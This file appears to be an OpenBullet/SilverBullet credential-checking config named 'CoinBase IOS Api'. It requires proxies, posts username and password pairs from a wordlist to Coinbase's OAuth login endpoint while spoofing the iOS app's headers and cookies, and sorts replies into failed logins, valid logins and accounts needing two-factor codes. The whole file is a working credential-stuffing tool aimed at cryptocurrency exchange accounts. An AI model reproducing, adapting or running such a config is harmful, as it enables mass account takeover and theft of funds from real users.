[SETTINGS]
{
  "Name": "CoinBase IOS Api",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-11T00:37:57.2984292+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "CoinBase IOS Api",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#login REQUEST POST "https://www.coinbase.com/oauth/authorize/with-credentials?client_id=6011662b0badfa97f9fed5a246526277ff2116affa98cfaacacd012a191ba38d&scope=all" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: sessions.coinbase.com" 
  HEADER "Bugsnag-Payload-Version: 1.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-us" 
  HEADER "Content-Type: application/json" 
  HEADER "Bugsnag-Sent-At: 2021-05-27T01:49:52Z" 
  HEADER "Content-Length: 600" 
  HEADER "User-Agent: Coinbase/91703 CFNetwork/1220.1 Darwin/20.3.0" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: __cf_bm=859c6ab4e28269ec2a36c6c237aa1de9f30fcd9b-1622080178-1800-AWkFshGMbIdseX4dPvyVZUfLdDWGkpYYuhVwnhMNxX2weq6gjPpsuUTEeOIggY8xh8fNZ3+DBO3gHvdZfjRwJwA=" 
  HEADER "Bugsnag-API-Key: f216b41641f329a52406ef236d0f6ff7" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "success\":false" 
    KEY "incorrect_credentials" 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "2fa_required" 

